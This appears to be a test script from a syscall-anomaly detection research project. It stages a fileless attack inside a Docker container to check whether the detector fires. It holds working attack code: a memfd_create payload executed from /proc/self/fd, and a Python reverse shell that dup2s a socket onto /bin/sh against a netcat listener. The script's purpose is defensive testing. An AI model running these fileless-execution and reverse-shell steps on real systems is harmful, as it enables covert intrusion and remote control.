#!/bin/bash
# Scenario 11: memfd_create fileless execution (OOD zero-day pattern)
#
# Why this matters for the paper:
#   This scenario is DELIBERATELY not represented in calibration. It
#   tests whether CausalTrace can catch a novel attack technique that
#   our 7 original scenarios did not train against. The payload never
#   touches disk — traditional file-based AV and static integrity
#   checks are blind. Detection must come from:
#     (a) the kernel invariant on memfd_create(319) + execve-from-fd,
#     (b) the bigram-distribution shift that any off-distribution
#         sequence of syscalls produces (captured by the sheaf
#         Laplacian's Mahalanobis edge energy).
#
# Attack shape:
#   1. Attacker payload runs inside ct-web (delivered via any upstream
#      vector — here we just spawn it directly).
#   2. memfd_create opens an anonymous file in RAM.
#   3. The binary is written to that fd.
#   4. execve("/proc/self/fd/N", ...) runs it — no on-disk trace.
#   5. Optional: reverse shell follows.
#
# Detection chain:
#   - Tier 1 memfd_create handler (Top-24): rare syscall -> alert.
#   - Tier 1 execve handler: execve path beginning with "/proc/self/fd/"
#     is a strict invariant -> Case A -> SIGKILL.
#   - Tier 3 sheaf: novel bigram (memfd_create, execve) at high count
#     shifts the CCA edge energy above the 4-sigma threshold.
#
# MITRE ATT&CK:
#   T1620 Reflective Code Loading
#   T1059 Command and Scripting Interpreter
#   T1027 Obfuscated Files or Information (fileless variant)
set -e
echo "=== SCENARIO 11: Fileless memfd_create execution (OOD) ==="
echo ""

HOST_IP=$(docker network inspect causaltrace_ct-net \
    --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}' 2>/dev/null || echo "172.20.0.1")

echo "[Step 1] Stage a payload into memfd (no disk write) and exec it"
docker exec ct-web python3 <<'PY' 2>&1 || true
import os, ctypes, sys
libc = ctypes.CDLL("libc.so.6", use_errno=True)
libc.syscall.restype = ctypes.c_int

# memfd_create — SYS_memfd_create = 319 on x86_64
fd = libc.syscall(319, ctypes.c_char_p(b"staged"), 0)
if fd < 0:
    print(f"memfd_create failed: errno={ctypes.get_errno()}")
    sys.exit(0)

# Write a tiny shell-script payload to the memfd.
payload = b"""#!/bin/sh
echo fileless_payload_running
id
"""
os.write(fd, payload)

# Execute from /proc/self/fd/N — classic fileless pattern.
try:
    os.execl(f"/proc/self/fd/{fd}", "staged")
except Exception as e:
    # Expected: SIGKILL from Tier 1 dispatcher before execve returns.
    print(f"execve denied or killed: {e}")
PY
echo "  Tier 1 should have emitted ALERT_FILELESS_EXEC and SIGKILLed."

sleep 1

# Step 2: attempt a second stage — staged payload opens a reverse shell.
# This validates that even if stage-1 detection somehow missed, stage-2
# dup2 invariant still closes the loop.
REV_PORT=9999
nc -l -p "$REV_PORT" >/dev/null 2>&1 &
REV_PID=$!
sleep 0.5

echo "[Step 2] (Defense-in-depth) reverse shell stage"
docker exec ct-web python3 <<PY 2>&1 || true
import socket, os, sys
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect(("${HOST_IP}", ${REV_PORT}))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    os.system("/bin/sh")
except Exception as e:
    print(f"reverse shell stage killed: {e}")
PY

kill "$REV_PID" 2>/dev/null || true

echo ""
echo "Detection layers expected:"
echo "  Tier 1 dispatcher: memfd_create(319) -> rare-syscall alert."
echo "  Tier 1 execve handler: /proc/self/fd/N path -> Case A -> SIGKILL."
echo "  Tier 3 sheaf: bigram (memfd_create, execve) shifts edge energy"
echo "    above the 4-sigma Mahalanobis threshold -> geometric alert."
echo "  Dup2 invariant (stage 2): unconditional Case A even if stage 1 missed."
echo "=== Scenario 11 complete ==="
